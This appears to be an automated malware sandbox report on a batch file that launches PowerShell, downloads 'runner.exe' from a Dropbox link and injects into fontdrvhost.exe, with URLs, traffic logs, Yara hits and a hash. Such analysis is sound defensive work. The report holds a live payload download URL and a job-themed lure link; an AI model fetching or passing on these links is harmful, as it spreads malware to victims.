Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/rowser
Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.dropbox.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sales.dropboxbusiness.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://showcase.dropbox.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.com
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.com/cd/0/get/CgZHOpNzhQw4YgiO7_Q1eiXI-xC_
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uca0471f41417b6dcd98d8de3ee0.dl.dropboxusercontent.com
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uca0471f41417b6dcd98d8de3ee0.dl.dropboxusercontent.com/cd/0/get/CgZVgLsyz241_BcFKRBGtAj2rvkL
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.docsend.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D1F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/page_success/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/pithos/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/playlist/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0E163000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1
Source: powershell.exe, 00000002.00000002.2341629826.0000013D25540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7gC
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0E163000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-des
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/service_worker.js
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/static/api/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/static/serviceworker/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/v/s/playlist/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropboxstatic.com/static/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hellofax.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hellosign.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.paypal.com/sdk/js

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443

Source: unknown	HTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.6.122.107:443 -> 192.168.2.4:49790 version: TLS 1.2

Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224348194.00000000029D0000.00000008.00000001.01000000.00000013.sdmp

Binary or memory string: DirectInput8Create

memstr_1b20dac9-e

Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2401851669.0000000005460000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_fbd7447a-0

Source: Yara match	File source: 23.3.bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe.5680000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.fontdrvhost.exe.5630000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.fontdrvhost.exe.5410000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.fontdrvhost.exe.5630000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.fontdrvhost.exe.5410000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe.5460000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000003.2409389529.0000000005410000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2409670656.0000000005630000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.2401851669.0000000005460000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.2402695142.0000000005680000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 932, type: MEMORYSTR

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe

Jump to dropped file

Source: C:\Windows\System32\fontdrvhost.exe	Code function: 30_2_000001F9D2EB0AC8 NtAcceptConnectPort,NtAcceptConnectPort,	30_2_000001F9D2EB0AC8
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 30_2_000001F9D2EB15C0 NtAcceptConnectPort,	30_2_000001F9D2EB15C0
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 30_2_000001F9D2EB1AA4 NtAcceptConnectPort,NtAcceptConnectPort,	30_2_000001F9D2EB1AA4
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 30_2_000001F9D2EB1CF4 NtAcceptConnectPort,CloseHandle,	30_2_000001F9D2EB1CF4

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C5C231	23_3_02C5C231
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C681D2	23_3_02C681D2
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C5C400	23_3_02C5C400
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 30_2_000001F9D2EB0C70	30_2_000001F9D2EB0C70

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe 4CD95BF0380DE67906211A1F7609EE91FF705D85EE45E14B1CAC6BED13D53C19

Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe

Code function: String function: 02C5CD90 appears 33 times

Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 444

Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000002.2387314243.0000000002B45000.00000040.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000002.2387922960.00000000048E9000.00000040.00001000.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2403797559.0000000002C79000.00000040.00000400.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2395260340.0000000002C79000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000002.2387314243.0000000002B45000.00000040.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000002.2387922960.00000000048E9000.00000040.00001000.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2403797559.0000000002C79000.00000040.00000400.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2395260340.0000000002C79000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_

Source: classification engine

Classification label: mal100.troj.evad.winBAT@72/328@16/10

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\fontdrvhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-e29e6db8-75ad-66a800-a519b0931317}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess9172
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_id41zrbs.zpd.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\122046760.bat" "

Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM ' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: SELECT DISTINCT ContainerID FROM ObjectDirTAB Where ObjectID IN (SELECT FatherID FROM ObjectDirTAB WHERE ContainerID = %u);
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: SELECT ObjectID FROM ObjectDirTAB WHERE ContainerID = %u AND ContainerID <> ObjectID;
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: SELECT DISTINCT ContainerID FROM ObjectDirTAB WHERE FatherID IN (SELECT ObjectID FROM ObjectDirTAB WHERE ContainerID = %u);
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name, %d+18,10) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#0,%Q);
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM ' \|\| quote(name) \|\| ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence';
